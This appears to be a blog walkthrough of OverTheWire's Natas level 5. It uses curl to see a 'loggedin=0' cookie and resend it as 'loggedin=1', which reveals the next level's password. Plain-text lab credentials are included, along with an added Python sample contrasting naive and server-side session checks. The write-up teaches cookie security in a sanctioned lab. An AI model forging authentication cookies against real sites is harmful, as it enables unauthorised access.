Saturday 27 September 2014

Wargames - Natas 05


Recommended reading:
With the credentials discovered in the previous challenge, head over to http://natas5.natas.labs.overthewire.org and take a look at its content. You can also look at the source code, but it won't help much:
Access disallowed. You are not logged in
This challenge is about cookies. Cookies play a big part in exploitation, and at some point you should always look at the cookies being set by the server, as they can help you a lot.
This time we're going to use curl with grep to see what cookies are being set (you can also just use your browser developer mode):
curl -I http://natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq@natas5.natas.labs.overthewire.org/ | grep "Set-Cookie:"
The -I flag tells curl to make a HEAD request, which only returns the headers. We then pipe the output to grep and search for "Set-Cookie:", the header that sets cookies, and this is what we get:
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
Set-Cookie: loggedin=0
So apparently the server sets a cookie named loggedin with the value 0. It's not hard to guess what we want to do next, which is to set that cookie to 1. To do this, we just run this command:
curl --cookie loggedin=1 http://natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq@natas5.natas.labs.overthewire.org/
And this is what we get:
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</div>
</body>
</html>
We're greeted with the password for natas6 on line 14 of the output.

User natas6
Password aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Pretty simple challenge, just so people get familiar with cookies and their usage.
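
Seen from the server side, the level works because the value of the loggedin cookie is the entire access decision. The following Python is an added example, not the Natas source or code from this post: it contrasts that check with a lookup of an opaque session ID in server-side state. The function names, the "session" cookie name and the in-memory SESSIONS store are assumptions made for illustration.

```python
import secrets
from http.cookies import SimpleCookie

# Hypothetical in-memory session store: session id -> server-side state.
# A real application would use a shared store with expiry.
SESSIONS = {}


def parse_cookie(header: str) -> dict:
    """Parse a Cookie request header into a name -> value dict."""
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def naive_is_logged_in(cookie_header: str) -> bool:
    """Flawed pattern from this level: the client-supplied flag decides access."""
    return parse_cookie(cookie_header).get("loggedin") == "1"


def start_session(authenticated: bool) -> str:
    """Create server-side state and return the cookie pair to send in Set-Cookie.

    The cookie carries only an unguessable identifier; the authentication
    flag itself never leaves the server.
    """
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"authenticated": authenticated}
    return f"session={sid}"


def hardened_is_logged_in(cookie_header: str) -> bool:
    """Trust only state the server stored; ignore any client-side flag."""
    sid = parse_cookie(cookie_header).get("session")
    state = SESSIONS.get(sid)
    return state is not None and state["authenticated"]


if __name__ == "__main__":
    anon = start_session(authenticated=False)
    user = start_session(authenticated=True)
    print("naive,    loggedin=1      :", naive_is_logged_in("loggedin=1"))
    print("hardened, loggedin=1      :", hardened_is_logged_in("loggedin=1"))
    print("hardened, anon + flag     :", hardened_is_logged_in(anon + "; loggedin=1"))
    print("hardened, real login      :", hardened_is_logged_in(user))
```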

Never Settle,
